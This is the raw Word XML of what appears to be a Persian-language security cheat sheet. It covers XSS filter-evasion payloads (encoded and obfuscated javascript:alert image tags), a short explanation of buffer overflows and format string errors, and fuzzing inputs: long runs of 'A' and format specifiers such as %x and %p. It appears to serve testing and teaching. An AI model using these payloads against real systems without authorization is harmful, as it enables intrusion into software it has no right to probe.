          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:bidi="fa-IR"/>
        </w:rPr>
        <w:t>javascript:alert</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004D2C96">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:bidi="fa-IR"/>
        </w:rPr>
        <w:t>('XSS')&gt; &lt;IMG SRC=</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004D2C96">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:bidi="fa-IR"/>
        </w:rPr>
        <w:t>JaVaScRiPt:alert</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004D2C96">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:bidi="fa-IR"/>
        </w:rPr>
        <w:t>('XSS')&gt;  &lt;IMG SRC=</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004D2C96">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:bidi="fa-IR"/>
        </w:rPr>
        <w:t>JaVaScRiPt:alert</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004D2C96">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:bidi="fa-IR"/>
        </w:rPr>
        <w:t>(&amp;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004D2C96">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:bidi="fa-IR"/>
        </w:rPr>
        <w:t>quot;XSS</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004D2C96">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:bidi="fa-IR"/>
        </w:rPr>
        <w:t>&lt;WBR&gt;&amp;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004D2C96">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:bidi="fa-IR"/>
        </w:rPr>
        <w:t>quot</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004D2C96">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:bidi="fa-IR"/>
        </w:rPr>
        <w:t xml:space="preserve">;)&gt; &lt;IMGSRC=&amp;#106;&amp;#97;&amp;#118;&amp;#97;&amp;&lt;WBR&gt;#115;&amp;#99;&amp;#114;&amp;#105;&amp;#112;&amp;&lt;WBR&gt;#116;&amp;#58;&amp;#97;  &amp;#108;&amp;#101;&amp;&lt;WBR&gt;#114;&amp;#116;&amp;#40;&amp;#39;&amp;#88;&amp;#83&lt;WBR&gt;;&amp;#83;&amp;#39;&amp;#41&gt; &lt;IMGSRC=&amp;#0000106&amp;#0000097&amp;&lt;WBR&gt;#0000118&amp;#0000097&amp;#0000115&amp;&lt;WBR&gt;#0000099&amp;#0000114&amp;#0000105&amp;&lt;W BR&gt;#0000112&amp;#0000116&amp;#0000058 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="335F9B54" w14:textId="77777777" w:rsidR="004D2C96" w:rsidRPr="004D2C96" w:rsidRDefault="004D2C96" w:rsidP="00A819B6">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:bidi="fa-IR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004D2C96">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:bidi="fa-IR"/>
        </w:rPr>
        <w:t xml:space="preserve">&amp;&lt;WBR&gt;#0000097&amp;#0000108&amp;#0000101&amp;&lt;WBR&gt;#0000114&amp;#0000116&amp;#0000040&amp;&lt;WBR&gt;#0000039&amp;#0000088&amp;#0000 083&amp;&lt;WBR&gt;#0000083&amp;#0000039&amp;#0000041&gt;             &lt;IMGSRC=&amp;#x6A&amp;#x61&amp;#x76&amp;#x61&amp;#x73&amp;&lt;WBR&gt;#x63&amp;#x72&amp;#x69&amp;#x70&amp;#x74&amp;#x3A&amp;&lt;WBR&gt;#x61&amp;#x6C&amp;#x65&amp;#x72 &amp;#x74&amp;#x28  &amp;&lt;WBR&gt;#x27&amp;#x58&amp;#x53&amp;#x53&amp;#x27&amp;#x29&gt; </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75D6C559" w14:textId="77777777" w:rsidR="00A819B6" w:rsidRDefault="004D2C96" w:rsidP="00A819B6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4D2C96">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:bidi="fa-IR"/>
        </w:rPr>
        <w:t>&lt;IMG SRC="</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004D2C96">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:bidi="fa-IR"/>
        </w:rPr>
        <w:t>jav</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004D2C96">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:bidi="fa-IR"/>
        </w:rPr>
        <w:t>&amp;#x09</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="004D2C96">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:bidi="fa-IR"/>
        </w:rPr>
        <w:t>;ascript:alert</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="004D2C96">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:bidi="fa-IR"/>
        </w:rPr>
        <w:t xml:space="preserve">(&lt;WBR&gt;'XSS');"&gt; </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B5DCD62" w14:textId="77777777" w:rsidR="00A819B6" w:rsidRDefault="004D2C96" w:rsidP="00A819B6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4D2C96">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:bidi="fa-IR"/>
        </w:rPr>
        <w:t>&lt;IMG SRC="</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004D2C96">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:bidi="fa-IR"/>
        </w:rPr>
        <w:t>jav</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004D2C96">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:bidi="fa-IR"/>
        </w:rPr>
        <w:t>&amp;#x0A</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="004D2C96">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:bidi="fa-IR"/>
        </w:rPr>
        <w:t>;ascript:alert</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="004D2C96">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:bidi="fa-IR"/>
        </w:rPr>
        <w:t xml:space="preserve">(&lt;WBR&gt;'XSS');"&gt; </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="689D11B9" w14:textId="77777777" w:rsidR="00836142" w:rsidRPr="004D2C96" w:rsidRDefault="004D2C96" w:rsidP="00A819B6">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:bidi="fa-IR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004D2C96">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:bidi="fa-IR"/>
        </w:rPr>
        <w:t>&lt;IMG SRC="</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004D2C96">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:bidi="fa-IR"/>
        </w:rPr>
        <w:t>jav</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004D2C96">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:bidi="fa-IR"/>
        </w:rPr>
        <w:t>&amp;#x0D</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="004D2C96">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:bidi="fa-IR"/>
        </w:rPr>
        <w:t>;ascript:alert</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="004D2C96">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:bidi="fa-IR"/>
        </w:rPr>
        <w:t>(&lt;WBR&gt;'XSS');"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CBDE056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4B54464B" w14:textId="54263251" w:rsidR="00836142" w:rsidRPr="006311DF" w:rsidRDefault="006311DF" w:rsidP="006311DF">
      <w:pPr>
        <w:jc w:val="center"/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</w:pPr>
      <w:r w:rsidRPr="006311DF"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  <w:t>BUFFER OVERFLOWS AND FORMAT STRING ERRORS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B19793E" w14:textId="3F48408D" w:rsidR="00836142" w:rsidRPr="006311DF" w:rsidRDefault="006311DF" w:rsidP="006311DF">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cs="B Nazanin"/>
          <w:color w:val="5B9BD5" w:themeColor="accent1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="fa-IR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006311DF">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cs="B Nazanin"/>
          <w:color w:val="5B9BD5" w:themeColor="accent1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="fa-IR"/>
        </w:rPr>
        <w:t>BUFFER OVERFLOWS (BFO)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B4D431A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7E13EE6B" w14:textId="17AF34DF" w:rsidR="00836142" w:rsidRDefault="006311DF" w:rsidP="006311DF">
      <w:pPr>
        <w:bidi/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</w:pP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سرر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ز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بافر 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ا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حمله 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خراب کردن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حافظه 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وضع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ت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برنامه نو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است که اجازه م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دهد داده ها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مجاز در</w:t>
      </w:r>
      <w:r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فراتر از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حد واقعی حافظه ذخیره شوند که در حقیقت یعنی ذخیره نمی شوند و سرریز می شوند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.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="378C070F" w14:textId="385E4C5E" w:rsidR="006311DF" w:rsidRPr="006311DF" w:rsidRDefault="006311DF" w:rsidP="006311DF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توجه داشته باش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که تلاش برا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بارگذار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تعر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ف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چن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 فا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ل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در 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برنامه </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006311DF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fuzzer</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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به طور بالقوه م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تواند برنامه را به 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خراب شدن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بکشاند.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="364BD20F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proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="006311DF">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:bidi="fa-IR"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>A</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="006311DF">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:bidi="fa-IR"/>
        </w:rPr>
        <w:t xml:space="preserve"> x 5 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73FEE088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proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="006311DF">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:bidi="fa-IR"/>
        </w:rPr>
        <w:t>A</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="006311DF">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:bidi="fa-IR"/>
        </w:rPr>
        <w:t xml:space="preserve"> x 17 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4599187D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proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="006311DF">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:bidi="fa-IR"/>
        </w:rPr>
        <w:t>A</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="006311DF">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:bidi="fa-IR"/>
        </w:rPr>
        <w:t xml:space="preserve"> x 33 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BEC6727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proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="006311DF">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:bidi="fa-IR"/>
        </w:rPr>
        <w:t>A</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="006311DF">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:bidi="fa-IR"/>
        </w:rPr>
        <w:t xml:space="preserve"> x 65 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="237E97D3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proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="006311DF">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:bidi="fa-IR"/>
        </w:rPr>
        <w:t>A</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="006311DF">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:bidi="fa-IR"/>
        </w:rPr>
        <w:t xml:space="preserve"> x 129 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EDA72C3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proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="006311DF">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:bidi="fa-IR"/>
        </w:rPr>
        <w:t>A</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="006311DF">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:bidi="fa-IR"/>
        </w:rPr>
        <w:t xml:space="preserve"> x 257 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="311766F1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proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="006311DF">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:bidi="fa-IR"/>
        </w:rPr>
        <w:t>A</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="006311DF">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:bidi="fa-IR"/>
        </w:rPr>
        <w:t xml:space="preserve"> x 513 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B9BA63E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proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="006311DF">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:bidi="fa-IR"/>
        </w:rPr>
        <w:t>A</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="006311DF">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:bidi="fa-IR"/>
        </w:rPr>
        <w:t xml:space="preserve"> x 1024 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C46EB33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proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="006311DF">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:bidi="fa-IR"/>
        </w:rPr>
        <w:t>A</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="006311DF">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:bidi="fa-IR"/>
        </w:rPr>
        <w:t xml:space="preserve"> x 2049 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F20BFD2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proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="006311DF">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:bidi="fa-IR"/>
        </w:rPr>
        <w:t>A</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="006311DF">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:bidi="fa-IR"/>
        </w:rPr>
        <w:t xml:space="preserve"> x 4097 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FA5A6FE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proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="006311DF">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:bidi="fa-IR"/>
        </w:rPr>
        <w:t>A</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="006311DF">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:bidi="fa-IR"/>
        </w:rPr>
        <w:t xml:space="preserve"> x 8193 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DAE84FE" w14:textId="61042381" w:rsidR="00836142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proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="006311DF">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:bidi="fa-IR"/>
        </w:rPr>
        <w:t>A</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="006311DF">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:bidi="fa-IR"/>
        </w:rPr>
        <w:t xml:space="preserve"> x 12288</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76D305C5" w14:textId="77777777" w:rsidR="000932D8" w:rsidRDefault="000932D8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</w:p>
    <w:p w14:paraId="300CB61C" w14:textId="5B28DAB2" w:rsidR="00836142" w:rsidRDefault="000932D8" w:rsidP="000932D8">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:color w:val="5B9BD5" w:themeColor="accent1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl/>
          <w:lang w:bidi="fa-IR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000932D8">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:color w:val="5B9BD5" w:themeColor="accent1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="fa-IR"/>
        </w:rPr>
        <w:t>FORMAT STRING ERRORS (FSE)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ABA56BA" w14:textId="6460C2B5" w:rsidR="000932D8" w:rsidRDefault="000932D8" w:rsidP="00B47205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>حملات رشته فرمت طبقه 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آس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ب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پذ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ها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هستند که شامل ته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ه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نشانه ها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فرمت خاص زبان برا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کد دلخواه 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خراب </w:t>
      </w:r>
      <w:r w:rsidR="00B47205">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cs="B Nazanin" w:hint="cs"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl/>
          <w:lang w:bidi="fa-IR"/>
        </w:rPr>
        <w:t>کردن برنامه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است. </w:t>
      </w:r>
      <w:r w:rsidR="00B47205" w:rsidRPr="004D2C96">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:lang w:bidi="fa-IR"/>
        </w:rPr>
        <w:t>FUZZING</w:t>
      </w:r>
      <w:r w:rsidR="00B47205">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:hint="cs"/>
          <w:rtl/>
          <w:lang w:bidi="fa-IR"/>
        </w:rPr>
        <w:t xml:space="preserve"> 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>برا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چن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اشتباهات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عنوان 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هدف برا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بررس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ورود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کاربر ناد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ده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گرفته شده است.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="495ABB93" w14:textId="173E5616" w:rsidR="000932D8" w:rsidRDefault="000932D8" w:rsidP="00B47205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توجه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داشته باش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د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که تلاش برا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بارگذار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B47205"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47205" w:rsidRPr="000932D8">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cs="B Nazanin"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl/>
          <w:lang w:bidi="fa-IR"/>
        </w:rPr>
        <w:t>تعر</w:t>
      </w:r>
      <w:r w:rsidR="00B47205"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B47205"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ف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چن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فا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ل</w:t>
      </w:r>
      <w:r w:rsid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در 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</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000932D8">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cs="B Nazanin"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="fa-IR"/>
        </w:rPr>
        <w:t>fuzzer</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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طور بالقوه م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برنامه را به </w:t>
      </w:r>
      <w:r w:rsidR="00B47205">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cs="B Nazanin" w:hint="cs"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl/>
          <w:lang w:bidi="fa-IR"/>
        </w:rPr>
        <w:t>خراب شدن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بکشاند.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2949E8A3" w14:textId="77777777" w:rsidR="00B47205" w:rsidRPr="00B47205" w:rsidRDefault="00B47205" w:rsidP="00B47205">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:lang w:bidi="fa-IR"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="53D0E7CC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 %s%p%x%d</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="630A81FE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>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="cs"/>
          <w:rtl/>
          <w:lang w:bidi="fa-IR"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00B47205">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:lang w:bidi="fa-IR"/>
        </w:rPr>
        <w:t xml:space="preserve">.1024d </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F07B25C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%.2049d </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7502ABA0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>%</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B47205">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:lang w:bidi="fa-IR"/>
        </w:rPr>
        <w:t>p%p%p%p</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B47205">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:lang w:bidi="fa-IR"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EC8169C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>%</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B47205">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:lang w:bidi="fa-IR"/>
        </w:rPr>
        <w:t>x%x%x%x</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B47205">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:lang w:bidi="fa-IR"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66877364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>%</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B47205">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:lang w:bidi="fa-IR"/>
        </w:rPr>
        <w:t>d%d%d%d</w:t>
      </w:r>
